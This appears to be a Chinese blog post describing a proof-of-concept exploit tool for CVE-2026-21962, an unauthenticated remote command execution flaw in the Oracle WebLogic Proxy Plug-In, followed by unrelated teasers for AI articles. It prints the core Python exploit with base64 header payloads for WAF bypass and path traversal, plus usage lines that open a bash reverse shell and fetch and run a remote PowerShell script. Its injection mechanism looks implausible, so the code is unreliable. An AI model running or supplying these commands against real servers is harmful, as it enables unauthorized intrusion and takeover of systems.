CVE-2026-21962漏洞利用工具:Oracle WebLogic代理插件未授权RCE检测与利用

CVE-2026-21962 - Oracle WebLogic Server Proxy Plug-In RCE

项目描述

该项目提供了一个针对Oracle WebLogic Server代理插件(Proxy Plug-In)中一个关键安全漏洞(CVE-2026-21962)的漏洞利用概念验证(PoC)脚本。该漏洞允许未经验证的远程攻击者通过HTTP协议在受影响的服务器上执行任意操作系统命令,风险等级极高(CVSS 10.0)。

影响组件

  • Oracle HTTP Server(版本12.2.1.4.0、14.1.1.0.0、14.1.2.0.0)
  • Oracle WebLogic Server代理插件(用于Apache HTTP Server和Microsoft IIS)

功能特性

核心功能

  • 自动漏洞检测:通过多种常见路径(/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/)探测目标系统是否存在漏洞
  • 远程命令执行:能够执行用户指定的任意操作系统命令
  • Payload编码:自动对Payload进行Base64编码,以绕过某些WAF/过滤器
  • 多种攻击向量:支持通过不同HTTP头(WL-Proxy-Client-IP、Proxy-Client-IP、X-Forwarded-For)注入Payload

高级特性

  • 跨平台支持:兼容Linux/Unix和Windows目标系统
  • 灵活Payload:支持执行简单命令、复杂Shell脚本或PowerShell命令
  • 输出解析:自动提取并显示命令执行结果
  • 错误处理:完善的异常处理和超时控制机制

检测能力

  • 支持通过HTTP状态码(200、302、500)判断漏洞存在性
  • 能够捕获并显示命令执行的输出结果
  • 提供详细的调试信息和错误报告

安装指南

环境要求

  • Python 3.x:确保系统已安装Python 3
  • 依赖库:需要安装requests
  • 操作系统:支持Linux、macOS和Windows

安装步骤

设置执行权限(可选)

chmod +x CVE-2026-21962.py 

安装Python依赖

pip install requests 

克隆或下载项目文件

git clone https://github.com/Ashwesker/Ashwesker-CVE-2026-21962.git cd Ashwesker-CVE-2026-21962 

验证安装

运行以下命令验证安装是否成功:

python3 CVE-2026-21962.py --help 

如果看到帮助信息,说明安装成功。

使用说明

基础使用

基本语法
python3 CVE-2026-21962.py <target_url>"<command>"
参数说明
  • target_url:目标服务器的URL(例如:http://target:7001https://oracle-server:4443
  • command:要执行的命令(例如:idwhoami或反向Shell命令)

使用示例

1. 基本信息收集

执行系统命令来验证漏洞:

python3 CVE-2026-21962.py http://target:7001 "id && whoami && uname -a"
2. 获取文件系统信息
python3 CVE-2026-21962.py http://target:7001 "ls -la / && df -h"
3. 反向Shell(Linux目标)

首先在攻击机启动监听:

nc -lvnp 4444

然后执行漏洞利用:

python3 CVE-2026-21962.py http://target:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
4. Windows目标利用
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"

输出说明

  • 成功迹象:HTTP状态码为200、302或500
  • 命令输出:如果命令有输出,会显示前1500个字符
  • 静默执行:如果命令执行成功但没有输出,会显示相应提示

注意事项

  1. 目标端口:通常WebLogic服务运行在7001端口,HTTPS服务可能运行在4443端口
  2. SSL证书:对于自签名证书的目标,可能需要禁用SSL验证
  3. 路径探测:工具会自动尝试多个常见代理插件路径
  4. WAF绕过:使用Base64编码和多种HTTP头尝试绕过防护

核心代码

主漏洞利用函数

defexploit(target_url, command):# 漏洞利用端点(常见代理插件路径) vuln_paths =["/weblogic/","/wl_proxy/","/bea_wls_internal/","/_proxy/","/proxy/"]# 构造触发反序列化/命令注入的恶意头部# 实际触发使用特制的WL-Proxy-Client-IP或类似头部# 结合绕过验证的特制URI payload =f"cmd:{command}"# Base64编码Payload以绕过WAF/过滤器 encoded_payload = base64.b64encode(payload.encode()).decode()# 构造恶意HTTP头部 headers ={"WL-Proxy-Client-IP":f"127.0.0.1;{encoded_payload}","Proxy-Client-IP":f"127.0.0.1;{encoded_payload}","X-Forwarded-For":f"127.0.0.1;{encoded_payload}","User-Agent":"Mozilla/5.0 (compatible; Exploit/1.0)","Accept":"*/*","Connection":"close"}# 触发插件漏洞的特制URI uri ="/weblogic/..;/bea_wls_internal/ProxyServlet"# 尝试所有可能的漏洞路径for base_path in vuln_paths: full_url =f"{target_url.rstrip('/')}{base_path}{uri}"print(f"[*] 尝试路径: {full_url}")print(f"[*] 执行命令: {command}")try:# 使用GET请求,某些配置下POST也可用 r = requests.get(full_url, headers=headers, timeout=12, verify=False, allow_redirects=False)# 根据HTTP状态码判断是否成功if r.status_code in[200,302,500]:print(f"[+] 可能成功!状态码: {r.status_code}")if r.text.strip():print("\n可能的命令输出/响应:\n"+"-"*60)print(r.text[:1500])# 显示前1500字符避免信息过多print("-"*60)else:print("[+] 命令静默执行(无输出)")returnTrueelse:print(f"[-] 状态码 {r.status_code} - 此路径无漏洞")except Exception as e:print(f"[-] 路径 {full_url} 错误: {e}")print("\n[-] 所有路径测试完成 - 目标可能无漏洞或插件未暴露。")returnFalse

命令行参数解析

if __name__ =="__main__":# 创建参数解析器 parser = argparse.ArgumentParser(description="CVE-2026-21962 PoC - Oracle WebLogic Proxy Plug-In RCE")# 目标URL参数 parser.add_argument("target",help="目标URL (例如 http://target:7001 或 https://oracle-server:4443)")# 命令参数 parser.add_argument("cmd",help="要执行的命令 (例如 'id' 或 'whoami' 或 'powershell -c ...' 或 'bash -i >& /dev/tcp/攻击者IP/4444 0>&1')")# 解析参数并执行漏洞利用 args = parser.parse_args() exploit(args.target, args.cmd)

漏洞检测逻辑

# 漏洞检测的核心逻辑# 1. 构造包含恶意命令的Payload# 2. 使用Base64编码绕过基本防护# 3. 通过多个HTTP头部字段注入Payload# 4. 使用路径遍历技术访问代理Servlet# 5. 分析响应判断漏洞是否存在# 关键点:# - 使用分号分隔IP地址和命令Payload# - 尝试多个可能的代理插件路径# - 支持HTTP和HTTPS协议# - 包含完善的超时和错误处理

安全注意事项

# 重要安全提示:# 1. 此工具仅用于授权的安全测试# 2. 在非授权系统上使用是非法的# 3. 使用前需获得明确书面授权# 4. 遵守所有适用法律法规# 技术建议:# 1. 及时应用Oracle 2026年1月关键补丁更新# 2. 限制对受影响服务的网络访问# 3. 监控HTTP流量中的可疑行为# 4. 定期审查系统日志和安全控制措施

版本兼容性

该工具设计用于以下受影响版本:

  • Oracle HTTP Server: 12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0
  • WebLogic Proxy Plug-in for Apache/IIS

免责声明: 所有PoC代码仅供道德、授权测试和教育目的使用。未经授权的利用是非法的,作者不承担任何滥用责任。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAPtA7C84tFVwza9UVc8THXK
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

Read more

揭秘 AIGC 背后的技术:GPT、BERT 与 Transformer 模型的工作原理

揭秘 AIGC 背后的技术:GPT、BERT 与 Transformer 模型的工作原理

一、引言 AIGC 的崛起与重要性 人工智能生成内容(AIGC)已经不再是未来的技术,它正以惊人的速度渗透到各行各业,重新定义了内容创作、媒体生产、甚至人类认知的边界。从深度学习到大规模自然语言处理,AIGC 的崛起代表着一种新型的智能化革命,其核心技术依赖于 Transformer 架构、GPT 和 BERT 等模型。这些技术不仅推动了自然语言处理(NLP)的进步,还在自动化写作、代码生成、艺术创作等多个领域取得了突破性进展。 AIGC 之所以成为技术热潮,背后是其颠覆性的效率提升和创新应用。比如,通过 GPT,我们可以在几秒钟内生成一篇文章,而传统写作过程可能需要几小时,甚至几天。这种技术的普及,不仅大大降低了内容创作的门槛,还为个体创作者、企业甚至国家带来了前所未有的生产力提升。 本文目的与结构概述 本文将深入探讨 AIGC 背后的核心技术——Transformer、GPT 和 BERT,带你一步步了解它们的架构原理、训练机制及实际应用。

By Ne0inhk

如何用LLama-Factory快速微调Qwen、Baichuan、ChatGLM?完整教程来了

如何用 LLama-Factory 快速微调 Qwen、Baichuan、ChatGLM? 在大模型落地的浪潮中,一个现实问题始终困扰着开发者:通用模型虽然强大,但在专业场景下却常常“答非所问”。比如让通义千问解释金融术语“商誉减值”,它可能给出教科书式的定义,却无法结合年报上下文分析其对企业利润的影响。这种差距正是领域适配能力的体现——而解决之道,就在微调。 但传统微调像一场硬仗:你需要写繁琐的数据处理脚本、配置复杂的训练参数、应对动辄上百GB的显存需求。更麻烦的是,不同模型结构各异,为 Qwen 写的训练代码,换到 Baichuan 上几乎要重来一遍。这道高墙把许多团队挡在了门外。 直到像 LLama-Factory 这样的集成化框架出现。它不只简化流程,而是重新定义了微调体验——你不再需要成为 PyTorch 专家,也能在几小时内完成一次高质量的模型定制。 这个开源项目名字里有“LLama”,实则野心更大:支持超过100种主流大模型架构,从 Meta 的 LLaMA 系列,到国产的

By Ne0inhk
【2025实测】10大AI模型API中转/聚合平台横评:一键集成GPT/Claude/文心一言,拒绝重复造轮子

【2025实测】10大AI模型API中转/聚合平台横评:一键集成GPT/Claude/文心一言,拒绝重复造轮子

当你需要同时调用GPT-4、Claude 3和文心一言时,是否还在为每个平台分别调试接口?2025年的AI开发,正在经历从“单个模型调用”到“多模型智能调度”的范式转变。 随着AI模型生态的日益繁荣,开发者面临的挑战不再是“没有选择”,而是“选择太多”。不同的API接口、各异的认证方式、分散的计费体系和波动的服务可用性,让原本聚焦业务创新的团队疲于应付基础设施的复杂性。 2025年的AI模型API中转平台正在成为解决这一痛点的关键基础设施。这些平台通过统一的接口协议、智能的路由策略和聚合的管理能力,让开发者可以像使用本地服务一样调用全球领先的AI能力。 01 2025年度十大API中转平台全景对比 本次横评基于2025年第一季度实际测试数据,从模型覆盖广度、接口统一程度、稳定可用性、成本效益和开发者体验五个核心维度,对主流API中转平台进行了系统评估。 平台名称核心功能与定位支持模型覆盖2025实测关键表现适用场景综合推荐指数PoloAPI统一接入层与智能调度中心GPT全系列、Claude、Gemini、文心一言、通义千问等20+接口响应延迟稳定在150ms内;智能路由

By Ne0inhk
国内Sora-2 API接入实测:小镜AIGC平台技术评测与性价比分析

国内Sora-2 API接入实测:小镜AIGC平台技术评测与性价比分析

摘要:本文基于2025年10月实测数据,对国内AI模型接入平台的技术表现进行评估。随着Sora-2等先进AI模型API的开放,开发者和企业面临接入成本高、稳定性要求高的双重挑战。本文将从定价策略、失败处理机制、并发能力等多个维度,客观分析小镜AIGC开放平台的服务表现。 1. 国内AI模型接入现状 当前,国内开发者接入国际先进AI模型面临多重挑战: * 直接接入壁垒高:国际主流AI服务商对国内用户存在注册限制、网络访问障碍 * 成本控制困难:官方API按量计费模式对中小规模应用不友好 * 技术集成复杂:需要处理网络优化、错误重试、负载均衡等技术细节 在此背景下,专业的API中转服务平台成为许多开发团队的务实选择。 2. 平台概况:小镜AIGC开放平台 小镜AIGC开放平台(https://aigc.x-see.cn/)提供多模型统一接入服务,支持包括Sora-2、Claude、Gemini-3等主流AI模型。平台定位为技术中立方,专注于提供稳定、高效的API转发服务。 3. 核心技术指标实测分析 3.1 定价与计费模型分析 这是小镜API最引人注目的特点。

By Ne0inhk